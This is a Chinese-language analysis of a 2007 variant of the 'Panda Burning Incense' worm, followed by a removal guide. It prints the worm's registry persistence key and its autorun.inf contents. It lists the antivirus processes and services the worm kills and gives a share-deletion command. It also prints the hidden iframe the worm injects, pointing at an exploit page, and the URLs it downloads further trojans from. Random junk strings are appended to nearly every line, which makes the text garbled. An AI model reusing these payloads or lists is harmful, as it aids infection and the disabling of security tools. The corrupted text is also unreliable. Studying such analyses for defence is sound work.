熊猫烧香最新变种分析及查杀方法

文件名称：nvscv32.exe Y0yO`W4  
F2`htM@,  
病毒名称：目前各杀毒软件无法查杀（已经将病毒样本上报各杀毒厂商） {&EZ>r-  
u%
1k  
中文名称：（尼姆亚，熊猫烧香） o-=d|dWG  
vZeYp  
病毒大小：68,570 字节 N3yB1_   
tP Efz+1N  
编写语言：Borland Delphi 6.0 - 7.0 a!y,!EB+Qu  
hRa(<ZK  
加壳方式：FSG 2.0 -> bart/xt :n4:@L<%H  
h@,e`Z  
发现时间：2007.1.16 zt[4_;2Y  
XBQ<  
危害等级：高 9^QYuf3O  
-)OkG#J@  
一、病毒描述： >6[ X }  
.)@tXH=}+  
含有病毒体的文件被运行后，病毒将自身拷贝至系统目录，同时修改注册表将自身设置为开机启动项，并遍历各个驱动器，将自身写入磁盘根目录下，增加一个 Autorun.inf文件，使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染，并对局域网其他电脑进行扫描，同时开另外一个线程连接某网站下载木马程序进行发动恶意攻击。 &:
;;u\  
TG63  
二：中毒现象： ]fADaw-R  
HA9Nr.NqC@  
1：在系统每个分区根目录下存在setup.exe和autorun.inf文件（A和B盘不感染）。 B3>Uba*-)}  
Z&]+A,  
2：无法手工修改“文件夹选项”将隐藏文件显示出来。 <duBwkiG  
Y%)h)El  
3：在每个感染后的文件夹中可见Desktop_ini的隐藏文件，内容为感染日期 如：2007-1-16 ,t%\0[{/B  
[CDXCV-z  
4：电脑上的所有脚本文件中加入以下代码：<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe> C9mzg  
MLt'YW^  
5:中毒后的机器上常见的反病毒软件及防火墙无法正常开启及运行。 C^,4`OI  
(~7m"?  
6：不能正常使用任务管理器，SREng.exe等工具。 @4_rxu&  
" _:iK]  
7：无故的向外发包，连接局域网中其他机器。 >'ksXA4b  
/NW>;J}C  
三：技术分析 xxoHH#a  
DrCWvpudd  
1：病毒文件运行后,将自身复制到%SystemRoot%\system32\drivers\nvscv32.exe {\svV 0)~  
c}IX"  
建立注册表自启动项: \]U<hub  
\,l.p_<  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] [ZKtbPHb  
K_AtU/  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" ^Y{6;FJ  
h0F0d^W.  
2：查找反病毒窗体病毒结束相关进程: T/GgF&i3  
#hgmUa  
天网防火墙 8O8\q ;US  
f@! fW&  
virusscan hJw |@V  
d; mmM\3]  
symantec antivirus V8sH{R-  
~?AC:  
system safety monitor bkr~13S{+  
`Di ^6UK(  
system repair engineer smfG,TI  
/nC{)s?S'  
wrapped gift killer 1V|< A  
Rwc[:6;fn  
游戏木马检测大师 s[G|q5n  
Gur8.A;Y  
超级巡警 mL:m;>JJ n  
AI1@-  
3：结束以下进程: [&h#iTRT  
^&+zA,aL,A  
mcshield.exe u}K5/hC  
wr$cK'5ZL  
vstskmgr.exe
@Jb@L  
zwM"`z  
naprdmgr.exe r{t.c?/  
,wtFs!8  
updaterui.exe jo9J%vo  
k{gl^  
tbmon.exe = n+q_.A  
"gXxRHTX  
scan32.exe rNxr
Q  
H$z>OS_6U  
ravmond.exe e>L5.~i  
q';&SR#"`K  
ccenter.exe $|4cJ#;^L  
F(Lb8\to\M  
ravtask.exe WGH%92  

,>D ja59  
rav.exe /xl4ohL$a  
\hs/D+MCk  
ravmon.exe r_b8,I6{]  
nd.57@*M  
ravmond.exe z-n>9  
Z5((1J9  
ravstub.exe Yo>`h2C4  
Ct4LkmD  
kvxp.kxp Oo FgQEr@  
r?fH &u  
kvmonxp.kxp U(U@!G)  
!Tv?%? 2l  
kvcenter.kxp iV5}U2Vh  
wk" l[cH>  
kvsrvxp.exe [/ AIKZM<  
{DU"]c/S  
kregex.exe 30D:ZmlY  
s(Z(e %  
uihost.exe *i@sUM?K  
M2}np  
trojdie.kxp j7K5SS_]  
=v.{JV#  
frogagent.exe 7; p4Wg7k}  
`,+#!)  
kvxp.kxp \Ke8W,)ew  
?N:B  
kvmonxp.kxp FC6xFg^  
+a|"{  
kvcenter.kxp <"<Mbbp  
KacR?Al  
kvsrvxp.exe 5?Bc Y;  
)D;*DUtMVm  
kregex.exe VM7 !0  
)CJES!! W  
uihost.exe yH^f\u0  
Q8p=!K  
trojdie.kxp cgyp5\*>+  
<j;]!qFR  
frogagent.exe hR-K@fS%l'  
@
<2d8ed  
logo1_.exe nP<S6:s:  
K}x_nW  
logo_1.exe o+NMA (  
</= CZy5w  
rundl132.exe 5k]XQxc6_  
%Uy%kN_&  
taskmgr.exe {(4# )K2g%  
JBz}|MD  
msconfig.exe 8!&nKy<Y  
@D)Z{=>{=5  
regedit.exe L1sqU-gt  
/be=u@KV  
sreng.exe 4jQ'+ 2it  
4：禁用下列服务: [>f]@>  
#Q}_e7t  
schedule
C
ZJV_0  
Vo\H<_=
G  
sharedaccess u^=`%)  
Ry?4h\UX5  
rsccenter }k7_'p&yk  
?R|th Z  
rsravmon 'f+NW&  
~M5:=zKQ  
rsccenter *t(4 $  
eZH~je{1  
kvwsc w~|1Wd<v  
:Xfn@>;3ui  
kvsrvxp z}+i=cAN  
L2fZ{bgy  
kvwsc %?9Ok  
*)'Vvu<  
kvsrvxp 3-C
\2  
{:bN/zV#  
kavsvc /aYpIMi9}  
.po>qb6  
avp ]]2k}A[-I  
e4\dpvL  
avp (?>cn_m  
l+zb~  
kavsvc _'!kuE,*1  
wfR&li{  
mcafeeframework <uci9-eC  
7C7>y/uS  
mcshield irKI
y  
&eQJfc\a  
mctaskmanager P|xG\3@Z  
XN;&qR^j  
mcafeeframework wvN
`R  
BI/&dKM  
mcshield q/PNJ#<  
lr~0p
L  
mctaskmanager oehaQ#e  
/Vww?9U;  
navapsvc ?mv:neh  
fThgK;Qy'U  
wscsvc w5,Mb  
-Q"hZ9  
kpfwsvc },@``&
e  
W\cjdd  
sndsrvc 2S~R!   
eSfnB_@x2  
ccproxy 5l{Ts04k%  
~F!,PM/  
ccevtmgr ]Oeh=gq  
YcDe@Zuwn  
ccsetmgr fCw*$:O  
b5a.go  
spbbcsvc 33Az$GXFsq  
B^v8,;jZT  
symantec core lc ZZxk]D<  
nw6pV%  
npfmntor -ijC_`>  
`y
iC=$*[  
mskservice Dw6fmyJ:  
9902+pW  
firesvc Fhf<T`  
>''U  
5：删除下列注册表项: zM#sOg  
K.~q+IYP[  
software\microsoft\windows\currentversion\run\ravtask WXw}^v  
P-`(0M7^  
software\microsoft\windows\currentversion\run\kvmonxp >ut" OL9J  
p@ NaD=9  
software\microsoft\windows\currentversion\run\kav u=x+J=AH  
b KtD"JG\  
software\microsoft\windows\currentversion\run\kavpersonal50 .a'f|c6  
sD;M!K_  
software\microsoft\windows\currentversion\run\mcafeeupdaterui &@FhR#pUQ  
zeb=8Dg :  
software\microsoft\windows\currentversion\run\network associates error reporting service p>w]rE:}  
+]Zva:$#`
 
software\microsoft\windows\currentversion\run\shstatexe i1lBto[  
AIYmS#V1W2  
software\microsoft\windows\currentversion\run\ylive.exe #%0Bx3uM  
QS[L~97m2M  
software\microsoft\windows\currentversion\run\yassistse w>; L{  
CusF/>  
6：感染所有可执行文件，并将图标改成（这次不是熊猫烧香那个图标了） 58Xzup_"  
{i0SS  
7：跳过下列目录: (t+;O;  
%QmxA 7fW  
windows w8S!%abl1  
kRCQv-*  
winnt s$ENFp7P  
!>
,m&O-x  
systemvolumeinformation 'xY@x-o  
dO> VwP  
recycled TfYVw~p_%  
x!LQxoNF  
windowsnt a8k;(/  
`{k"8#4:qA  
windowsupdate Hb} X-6N  
W!Hm~9fz  
windowsmediaplayer {9Y
+.46S  
Dl(3wgA  
outlookexpress q;g>t5]a  
L!0OC''C  
netmeeting vX0f,y  
!G^L/?z3  
commonfiles '.Ed`?<p  
RqEH|EUZ  
complusapplications gI^oU4mq  
4;n6I)&.(  
commonfiles 3~S'LxV  
y&}E~5O  
messenger {vUN+We  
u0
aJu  
installshieldinstallationinformation [[PEa-992  
gVQjL+_W  
msn 61puqiGG^  
zJP6F.Ov!  
microsoftfrontpage Y}#h5\  
\PDd$syDA  
moviemaker t@u7RL*n:<  
fVb-$  
msngaminzone x~xa6  
'WaPrCw@Mf  
8：删除*.gho备份文件. +fvaUV_-  
J)P$2#  
9：在所有驱动器根目录建立自身文件副本setup.exe,建立autorun.inf文件使病毒自动运行,设置文件属性为隐藏、只读、系统. |f~@8|MQP+  
bM8If"  
autorun.inf内容： 2gO2jJlv  
G!K]W:m  
程序代码 IDnC<MO>  
6q
cO?U  
[AutoRun] |D, +P  
3a.kBzus  
OPEN=setup.exe wP[t0/dl  
fRg`UI4w}  
shellexecute=setup.exe Q+4Xs.#  
j'9"cE5_  
shell\Auto\command=setup.exe b Q]/?cCYV  
K>*a*[t0Sy  
10：删除共享：cmd.exe /c net share admin$ /del /y ylt`*|$  
t#q<n:WeYU  
11：在机器上所有脚本文件中加入<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>，此代码地址是一个利用MS-06014漏洞攻击的网页木马，一旦用户浏览中此病毒的服务器上的网页，如果系统没有打补丁，就会下载执行此病毒。 /rUo{j  
^G6RjJxqp8  
12：扫描局域网机器，一旦发现漏洞，就迅速传播。 1
V8-^  
13：在后台访问http://www.whboy.net/update/wormcn.txt，根据下载列表下载其他病毒。 EwOV;>@T?  
8\{^|y9-  
目前下载列表如下： <n]x#0p  
h;6lK$!c  
http://www.krvkr.com/down/cq.exe E<y
W\  
XC.%za8  
http://www.krvkr.com/down/mh.exe V<Z[ nq  
rn<PR*  
http://www.krvkr.com/down/my.exe =Zi2jL?On  
gx%|Pgd  
http://www.krvkr.com/down/wl.exe >JiltF7H0  
BJ% eZ.  
http://www.krvkr.com/down/rx.exe ?O>V%@  
In`mtn q  
http://www.krvkr.com/down/wow.exe (V4 ~`i4V  
P2bZ65>3y  
http://www.krvkr.com/down/zt.exe Yo[;W vu  
7b<yVP;{  
http://www.krvkr.com/down/wm.exe d/i`l*  
AhZ8 0!  
http://www.krvkr.com/down/dj.exe P*cNh43U  
4'0Dr++  
http://www.krvkr.com/cn/iechajian.exe `ho1nY$)CE  
% LJs  
到此病毒行为分析完毕。 r/SG 4  
br|;'i%(  
四：Sec120.Com专家解决方案： uDEvzk42  
O BN2 ) j  
1：关闭网络共享，断开网络。 .k,kTr$S  
gG/!,Q.Qh  
2：使用IceSword结束掉nvscv32.exe进程（速度要快，抢在病毒感染IceSword前） !Y-98<|b M  
TYy.jFT-  
3:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue的数值改为1 fl\ly`_  
z<yU-m2h
 
4：删除注册表启动项 7}X[ 4("bB  
5H ue7'LS  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] @HOBRRm`  
9=UkV\m)  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" 3`k;a1Z#O'  
V3"=w&2]K  
5：删除C:\WINDOWS\system32\drivers\nvscv32.exe K

N*  
hNzB4p  
6：删除每个盘根目录下的autorun.inf文件和setup.exe文件，利用搜索功能，将Desktop_.ini全部删除。 E2m8UBS  
lBaR  
7：如果电脑上有脚本文件，将病毒代码全部删除。 \_lod kf  
~J P=T  
8：关闭系统的自动播放功能。 m@^1JlH  
qTqwPWW*  
这样就基本上将病毒清除了